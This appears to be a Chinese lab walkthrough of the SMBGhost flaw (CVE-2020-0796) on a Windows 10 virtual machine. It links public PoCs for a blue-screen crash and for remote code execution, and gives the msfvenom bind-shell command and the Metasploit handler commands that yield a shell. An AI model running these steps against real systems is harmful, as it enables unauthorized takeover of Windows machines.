永恒之蓝2.0(CVE-2020-0796)getshell

(一)漏洞介绍

永恒之蓝 2.0 来了,基于SMBv3的漏洞,Windows 8和Windows Server 2012 - Windows 10 最新版全部中招,属于系统级漏洞,利用这一漏洞会使系统遭受“蠕虫型”攻击,这意味着很容易从一个受害者感染另一个受害者,一开机就感染。

提权后可以做任意操作,例如加密你的文件勒索你。比如说像 EternalBlue 1.0 (永恒之蓝 1.0) 一样,加密文件,对你进行勒索虚拟货币!

在微软发布修补CVE-2020-0796漏洞的安全更新之前,CiscoTalos分享了通过禁用SMBv3压缩和拦截计算机的445端口来防御利用该漏洞发起的攻击。

(二)漏洞复现

一、环境准备:

目标机:windows 10 x64     IP地址:192.168.205.134 (关闭防火墙)

永恒之蓝2.0(CVE-2020-0796)getshell_第1张图片
永恒之蓝2.0(CVE-2020-0796)getshell_第2张图片

攻击机:Kali Linux    IP地址:192.168.142.128

二、漏洞攻击——目标主机蓝屏


1、POC下载:https://github.com/eerykitty/CVE-2020-0796-PoC

2、下载解压至Kali Linux虚拟机,cd到POC文件夹中,Python3编译执行CVE-2020-0796.py(python3 CVE-2020-0796.py  目标主机IP地址)

执行下图中命令:

永恒之蓝2.0(CVE-2020-0796)getshell_第3张图片

3、执行后目标主机蓝屏。

永恒之蓝2.0(CVE-2020-0796)getshell_第4张图片
攻击结果

三、漏洞利用-getshell


1、脚本下载解压

下载地址:https://github.com/chompie1337/SMBGhost_RCE_PoC,下载后解压至Kali Linux虚拟机。


永恒之蓝2.0(CVE-2020-0796)getshell_第5张图片

2、msfvenom生成正向连接木马

有关msfvenom详细使用可参考https://www.jianshu.com/p/dee2b171a0a0

命令:msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

永恒之蓝2.0(CVE-2020-0796)getshell_第6张图片

用生成的shellcode将文件夹中exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)

将替换完后的exploit.py复制到Kali中脚本目录下。

3、开启msf监听

命令:

use exploit/multi/handler

setpayload windows/x64/meterpreter/bind_tcp

set lport 4444 //监听端口

set rhost 192.168.205.134  //目标主机

run


永恒之蓝2.0(CVE-2020-0796)getshell_第7张图片

4、运行exploit.py脚本,反弹shell

永恒之蓝2.0(CVE-2020-0796)getshell_第8张图片

获取目标主机shell。

永恒之蓝2.0(CVE-2020-0796)getshell_第9张图片

你可能感兴趣的:(永恒之蓝2.0(CVE-2020-0796)getshell)